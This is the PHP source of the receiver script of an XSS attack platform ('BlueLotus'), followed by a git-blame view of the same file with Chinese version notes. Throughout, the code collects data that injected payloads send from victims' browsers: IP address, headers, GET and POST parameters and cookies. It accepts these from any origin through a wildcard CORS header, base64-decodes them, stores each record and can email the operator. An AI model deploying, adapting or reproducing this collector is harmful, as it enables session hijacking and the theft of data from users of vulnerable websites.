BlueLotus_XSSReceiver/index.php

<?php
define("IN_XSS_PLATFORM", true);
ignore_user_abort(true);
error_reporting(0);

//sometimes we only need "referer".

/*
if(count($_GET)==0&&count($_POST)==0&&count($_COOKIE)==0)
exit();
*/
header("Access-Control-Allow-Origin:*");
require_once("functions.php");
require_once("dio.php");

$info = array();

$user_IP        = getRealIP();
$user_port      = isset($_SERVER['REMOTE_PORT']) ? $_SERVER['REMOTE_PORT'] : "unknown";
$protocol       = isset($_SERVER['SERVER_PROTOCOL']) ? $_SERVER['SERVER_PROTOCOL'] : "unknown";
$request_method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : "unknown";
$request_URI    = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : "unknown";
$request_time   = isset($_SERVER['REQUEST_TIME']) ? $_SERVER['REQUEST_TIME'] : time();

$headers_data = getallheaders();

//如果提交的数据有base64编码的就解码
$get_data            = $_GET;
$decoded_get_data    = tryBase64Decode($_GET);
$post_data           = $_POST;
$decoded_post_data   = tryBase64Decode($_POST);
$cookie_data         = $_COOKIE;
$decoded_cookie_data = tryBase64Decode($_COOKIE);

//防xss过滤，对array要同时处理key与value
$info['user_IP']        = stripStr($user_IP);
$info['user_port']      = stripStr($user_port);
$info['protocol']       = stripStr($protocol);
$info['request_method'] = stripStr($request_method);
$info['request_URI']    = stripStr($request_URI);
$info['request_time']   = stripStr($request_time);
$info['headers_data']   = stripArr($headers_data);

$info['get_data'] = stripArr($get_data);
if ($decoded_get_data)
    $info['decoded_get_data'] = stripArr($decoded_get_data);

$info['post_data'] = stripArr($post_data);
if ($decoded_post_data)
    $info['decoded_post_data'] = stripArr($decoded_post_data);

$info['cookie_data'] = stripArr($cookie_data);
if ($decoded_cookie_data)
    $info['decoded_cookie_data'] = stripArr($decoded_cookie_data);

//判断是否keepsession（判断标准：get或者post或者cookie包含keepsession=1）
$info['keepsession'] = isKeepSession($info) ? true : false;

save_xss_record(json_encode($info), $request_time);

//发送邮件通知
if (MAIL_ENABLE) {
    require_once("mail.php");
    @send_mail($info);
}
-												simple version

											
										
										
											2015-10-12 15:24:09 +08:00
+								<?php
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								define("IN_XSS_PLATFORM", true);
-												Version 3.1.0
添加邮件提醒，如需要此功能请在config.php中开启并配置相关信息

											
										
										
											2016-01-25 12:42:19 +08:00
+								ignore_user_abort(true);
 								error_reporting(0);
-												Version 3.4.0
1. 增加了ADMIN_IP_CHECK_ENABLE与XFF_ENABLE两个选项，在有反代或负载均衡的情况下可开启XFF_ENABLE，关闭ADMIN_IP_CHECK_ENABLE
2. 修复一系列bug

											
										
										
											2016-12-27 21:49:19 +08:00
+								//sometimes we only need "referer".
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
+								/*
 								if(count($_GET)==0&&count($_POST)==0&&count($_COOKIE)==0)
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								exit();
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
+								*/
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								header("Access-Control-Allow-Origin:*");
-												Version 2.0
实现基本功能
实现了基本界面admin.php
支持查看各种信息，支持自动base64解码

todolist
keepsession
认证
完全启用CSP
我的js
js模板

为实现一些jqxgrid无法实现的功能改动了jqx库，详见diff文件夹

											
										
										
											2015-10-27 12:26:59 +08:00
+								require_once("functions.php");
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
+								require_once("dio.php");
 								$info = array();
-												Version 3.4.0
1. 增加了ADMIN_IP_CHECK_ENABLE与XFF_ENABLE两个选项，在有反代或负载均衡的情况下可开启XFF_ENABLE，关闭ADMIN_IP_CHECK_ENABLE
2. 修复一系列bug

											
										
										
											2016-12-27 21:49:19 +08:00
+								$user_IP        = getRealIP();
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$user_port      = isset($_SERVER['REMOTE_PORT']) ? $_SERVER['REMOTE_PORT'] : "unknown";
 								$protocol       = isset($_SERVER['SERVER_PROTOCOL']) ? $_SERVER['SERVER_PROTOCOL'] : "unknown";
 								$request_method = isset($_SERVER['REQUEST_METHOD']) ? $_SERVER['REQUEST_METHOD'] : "unknown";
 								$request_URI    = isset($_SERVER['REQUEST_URI']) ? $_SERVER['REQUEST_URI'] : "unknown";
 								$request_time   = isset($_SERVER['REQUEST_TIME']) ? $_SERVER['REQUEST_TIME'] : time();
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$headers_data = getallheaders();
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
-												Version 2.2.2
增加注销按钮
完善注释

											
										
										
											2015-10-30 22:46:04 +08:00
+								//如果提交的数据有base64编码的就解码
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$get_data            = $_GET;
 								$decoded_get_data    = tryBase64Decode($_GET);
 								$post_data           = $_POST;
 								$decoded_post_data   = tryBase64Decode($_POST);
 								$cookie_data         = $_COOKIE;
 								$decoded_cookie_data = tryBase64Decode($_COOKIE);
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
-												Version 2.2.2
增加注销按钮
完善注释

											
										
										
											2015-10-30 22:46:04 +08:00
+								//防xss过滤，对array要同时处理key与value
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$info['user_IP']        = stripStr($user_IP);
 								$info['user_port']      = stripStr($user_port);
 								$info['protocol']       = stripStr($protocol);
-												Version 1.1

											
										
										
											2015-10-17 11:05:09 +08:00
+								$info['request_method'] = stripStr($request_method);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$info['request_URI']    = stripStr($request_URI);
 								$info['request_time']   = stripStr($request_time);
 								$info['headers_data']   = stripArr($headers_data);
-												Version 1.1

											
										
										
											2015-10-17 11:05:09 +08:00
 								$info['get_data'] = stripArr($get_data);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								if ($decoded_get_data)
 								    $info['decoded_get_data'] = stripArr($decoded_get_data);
-												Version 1.1

											
										
										
											2015-10-17 11:05:09 +08:00
 								$info['post_data'] = stripArr($post_data);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								if ($decoded_post_data)
 								    $info['decoded_post_data'] = stripArr($decoded_post_data);
-												Version 1.1

											
										
										
											2015-10-17 11:05:09 +08:00
 								$info['cookie_data'] = stripArr($cookie_data);
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								if ($decoded_cookie_data)
 								    $info['decoded_cookie_data'] = stripArr($decoded_cookie_data);
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
-												Version 2.2.2
增加注销按钮
完善注释

											
										
										
											2015-10-30 22:46:04 +08:00
+								//判断是否keepsession（判断标准：get或者post或者cookie包含keepsession=1）
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								$info['keepsession'] = isKeepSession($info) ? true : false;
-												Version 1.0

											
										
										
											2015-10-13 00:07:10 +08:00
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								save_xss_record(json_encode($info), $request_time);
-												Version 3.1.0
添加邮件提醒，如需要此功能请在config.php中开启并配置相关信息

											
										
										
											2016-01-25 12:42:19 +08:00
 								//发送邮件通知
-												Version 3.3.0
添加安装脚本install.php

											
										
										
											2016-01-28 02:19:09 +08:00
+								if (MAIL_ENABLE) {
 								    require_once("mail.php");
 								    @send_mail($info);
 								}